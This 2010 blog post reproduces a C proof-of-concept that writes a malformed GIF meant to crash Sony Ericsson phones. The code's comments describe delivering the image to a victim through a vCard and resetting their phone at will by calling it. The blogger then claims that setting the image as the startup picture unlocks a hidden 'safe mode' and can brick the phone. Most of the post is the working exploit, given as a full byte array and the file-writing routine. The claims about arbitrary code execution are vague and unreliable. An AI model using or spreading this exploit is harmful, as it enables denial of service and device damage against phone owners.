Tuesday, 29 June 2010

Sony Erricsson: From Crash To Brick

Fellow nerds may recall the GIF file crach by LE Quack posted on inj3ct0r.com, if you didn't see it, here is some C code to generate the file:

// ,-------------------------------------------,

// | [+] Title: Sony Ericsson GIF Crash bug    |

// | [+] Date: 2010-06-07                      |

// | [+] Author: Le Quack                      |

// | [+] Version: All Sony Ericssons from Txxx |

// | [+] Tested on: T630, K750i, W610i         |

// | [+] Category: Local                       |

// `-------------------------------------------'



// ,--------------------------------------------------------------------------------------------------,

// | Any attempt to show generated image will crash the phone (white screen and restart).             |

// | It is also possible to create a vCard containing this image (Google), that will be automatically |

// | saved in the images' main directory just after accepting our vCard by victim. Of course you can  |

// | include your phone number and reset victim's phone whenever you want (just call him). The only   |

// | way to get rid of this file is deleting it by cable/bluetooth (or just format a memory).         |

// `--------------------------------------------------------------------------------------------------'



#include 



using namespace std;



int main(int argc, char **argv)

{

unsigned char data[] =

{

0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x01, 0x00, 0x01, 0x00, 0xF7, 0x00, 0x00, 0x00, 0x00, 0x00,

0x80, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x80, 0x00, 0x00, 0x00, 0x80, 0x80, 0x00, 0x80, 0x00,

0x80, 0x80, 0x80, 0x80, 0x80, 0xC0, 0xC0, 0xC0, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0x00, 0xFF, 0xFF,

0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 0x00, 0x66, 0x00, 0x00,

0x99, 0x00, 0x00, 0xCC, 0x00, 0x00, 0xFF, 0x00, 0x33, 0x00, 0x00, 0x33, 0x33, 0x00, 0x33, 0x66,

0x00, 0x33, 0x99, 0x00, 0x33, 0xCC, 0x00, 0x33, 0xFF, 0x00, 0x66, 0x00, 0x00, 0x66, 0x33, 0x00,

0x66, 0x66, 0x00, 0x66, 0x99, 0x00, 0x66, 0xCC, 0x00, 0x66, 0xFF, 0x00, 0x99, 0x00, 0x00, 0x99,

0x33, 0x00, 0x99, 0x66, 0x00, 0x99, 0x99, 0x00, 0x99, 0xCC, 0x00, 0x99, 0xFF, 0x00, 0xCC, 0x00,

0x00, 0xCC, 0x33, 0x00, 0xCC, 0x66, 0x00, 0xCC, 0x99, 0x00, 0xCC, 0xCC, 0x00, 0xCC, 0xFF, 0x00,

0xFF, 0x00, 0x00, 0xFF, 0x33, 0x00, 0xFF, 0x66, 0x00, 0xFF, 0x99, 0x00, 0xFF, 0xCC, 0x00, 0xFF,

0xFF, 0x33, 0x00, 0x00, 0x33, 0x00, 0x33, 0x33, 0x00, 0x66, 0x33, 0x00, 0x99, 0x33, 0x00, 0xCC,

0x33, 0x00, 0xFF, 0x33, 0x33, 0x00, 0x33, 0x33, 0x33, 0x33, 0x33, 0x66, 0x33, 0x33, 0x99, 0x33,

0x33, 0xCC, 0x33, 0x33, 0xFF, 0x33, 0x66, 0x00, 0x33, 0x66, 0x33, 0x33, 0x66, 0x66, 0x33, 0x66,

0x99, 0x33, 0x66, 0xCC, 0x33, 0x66, 0xFF, 0x33, 0x99, 0x00, 0x33, 0x99, 0x33, 0x33, 0x99, 0x66,

0x33, 0x99, 0x99, 0x33, 0x99, 0xCC, 0x33, 0x99, 0xFF, 0x33, 0xCC, 0x00, 0x33, 0xCC, 0x33, 0x33,

0xCC, 0x66, 0x33, 0xCC, 0x99, 0x33, 0xCC, 0xCC, 0x33, 0xCC, 0xFF, 0x33, 0xFF, 0x00, 0x33, 0xFF,

0x33, 0x33, 0xFF, 0x66, 0x33, 0xFF, 0x99, 0x33, 0xFF, 0xCC, 0x33, 0xFF, 0xFF, 0x66, 0x00, 0x00,

0x66, 0x00, 0x33, 0x66, 0x00, 0x66, 0x66, 0x00, 0x99, 0x66, 0x00, 0xCC, 0x66, 0x00, 0xFF, 0x66,

0x33, 0x00, 0x66, 0x33, 0x33, 0x66, 0x33, 0x66, 0x66, 0x33, 0x99, 0x66, 0x33, 0xCC, 0x66, 0x33,

0xFF, 0x66, 0x66, 0x00, 0x66, 0x66, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x99, 0x66, 0x66, 0xCC,

0x66, 0x66, 0xFF, 0x66, 0x99, 0x00, 0x66, 0x99, 0x33, 0x66, 0x99, 0x66, 0x66, 0x99, 0x99, 0x66,

0x99, 0xCC, 0x66, 0x99, 0xFF, 0x66, 0xCC, 0x00, 0x66, 0xCC, 0x33, 0x66, 0xCC, 0x66, 0x66, 0xCC,

0x99, 0x66, 0xCC, 0xCC, 0x66, 0xCC, 0xFF, 0x66, 0xFF, 0x00, 0x66, 0xFF, 0x33, 0x66, 0xFF, 0x66,

0x66, 0xFF, 0x99, 0x66, 0xFF, 0xCC, 0x66, 0xFF, 0xFF, 0x99, 0x00, 0x00, 0x99, 0x00, 0x33, 0x99,

0x00, 0x66, 0x99, 0x00, 0x99, 0x99, 0x00, 0xCC, 0x99, 0x00, 0xFF, 0x99, 0x33, 0x00, 0x99, 0x33,

0x33, 0x99, 0x33, 0x66, 0x99, 0x33, 0x99, 0x99, 0x33, 0xCC, 0x99, 0x33, 0xFF, 0x99, 0x66, 0x00,

0x99, 0x66, 0x33, 0x99, 0x66, 0x66, 0x99, 0x66, 0x99, 0x99, 0x66, 0xCC, 0x99, 0x66, 0xFF, 0x99,

0x99, 0x00, 0x99, 0x99, 0x33, 0x99, 0x99, 0x66, 0x99, 0x99, 0x99, 0x99, 0x99, 0xCC, 0x99, 0x99,

0xFF, 0x99, 0xCC, 0x00, 0x99, 0xCC, 0x33, 0x99, 0xCC, 0x66, 0x99, 0xCC, 0x99, 0x99, 0xCC, 0xCC,

0x99, 0xCC, 0xFF, 0x99, 0xFF, 0x00, 0x99, 0xFF, 0x33, 0x99, 0xFF, 0x66, 0x99, 0xFF, 0x99, 0x99,

0xFF, 0xCC, 0x99, 0xFF, 0xFF, 0xCC, 0x00, 0x00, 0xCC, 0x00, 0x33, 0xCC, 0x00, 0x66, 0xCC, 0x00,

0x99, 0xCC, 0x00, 0xCC, 0xCC, 0x00, 0xFF, 0xCC, 0x33, 0x00, 0xCC, 0x33, 0x33, 0xCC, 0x33, 0x66,

0xCC, 0x33, 0x99, 0xCC, 0x33, 0xCC, 0xCC, 0x33, 0xFF, 0xCC, 0x66, 0x00, 0xCC, 0x66, 0x33, 0xCC,

0x66, 0x66, 0xCC, 0x66, 0x99, 0xCC, 0x66, 0xCC, 0xCC, 0x66, 0xFF, 0xCC, 0x99, 0x00, 0xCC, 0x99,

0x33, 0xCC, 0x99, 0x66, 0xCC, 0x99, 0x99, 0xCC, 0x99, 0xCC, 0xCC, 0x99, 0xFF, 0xCC, 0xCC, 0x00,

0xCC, 0xCC, 0x33, 0xCC, 0xCC, 0x66, 0xCC, 0xCC, 0x99, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xFF, 0xCC,

0xFF, 0x00, 0xCC, 0xFF, 0x33, 0xCC, 0xFF, 0x66, 0xCC, 0xFF, 0x99, 0xCC, 0xFF, 0xCC, 0xCC, 0xFF,

0xFF, 0xFF, 0x00, 0x00, 0xFF, 0x00, 0x33, 0xFF, 0x00, 0x66, 0xFF, 0x00, 0x99, 0xFF, 0x00, 0xCC,

0xFF, 0x00, 0xFF, 0xFF, 0x33, 0x00, 0xFF, 0x33, 0x33, 0xFF, 0x33, 0x66, 0xFF, 0x33, 0x99, 0xFF,

0x33, 0xCC, 0xFF, 0x33, 0xFF, 0xFF, 0x66, 0x00, 0xFF, 0x66, 0x33, 0xFF, 0x66, 0x66, 0xFF, 0x66,

0x99, 0xFF, 0x66, 0xCC, 0xFF, 0x66, 0xFF, 0xFF, 0x99, 0x00, 0xFF, 0x99, 0x33, 0xFF, 0x99, 0x66,

0xFF, 0x99, 0x99, 0xFF, 0x99, 0xCC, 0xFF, 0x99, 0xFF, 0xFF, 0xCC, 0x00, 0xFF, 0xCC, 0x33, 0xFF,

0xCC, 0x66, 0xFF, 0xCC, 0x99, 0xFF, 0xCC, 0xCC, 0xFF, 0xCC, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,

0x33, 0xFF, 0xFF, 0x66, 0xFF, 0xFF, 0x99, 0xFF, 0xFF, 0xCC, 0xFF, 0xFF, 0xFF, 0x21, 0xF9, 0x04,

0x01, 0x00, 0x00, 0x10, 0x00, 0x2C, 0xF0, 0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,

0x04, 0x00, 0xFF, 0x05, 0x04, 0x00, 0x3B,

} ;



printf("\n[+] Sony Ericsson GIF Crash bug\n");

printf("[+] Coded and discovered by Le Quack \n");

printf("[+] Generated file should work with models from Txxx, tested on T630, K750i, W610i\n\n");



if(argc != 2)

{

printf("[+] Usage: %s \n", argv[0]);

return 0;

}



FILE* pFile;

pFile = fopen(argv[1], "wb");

if(pFile == NULL)

{

printf("[-] Error creating file. Exiting.");

return 0;

}



fwrite(data, 1, sizeof(data), pFile);



printf("[+] File has been saved as \"%s\"\n", argv[1]);

printf("[+] Written %d bytes\n", sizeof(data));



fclose(pFile);



return 0;
}
 Anyway, To activate the hidden safe mode on Sony Erricsson phones using this image and unlocking an option where arbitary code can be executed(with added work) just set it too the start-up picture.



The phone goes into panic mode, wherein any function which affects or uses external hardware (e.g camera or light) is disabled. The clicking of one of these things will leave the phone bricked if you turn it off without setting a different start-up picture.



The benefit of this hidden mode is that is does things dodgier, and pretty much dismounts any attempt to verify hardware.















Posted by



at






































No comments:















Post a Comment


















        

      









Subscribe to:
Post Comments (Atom)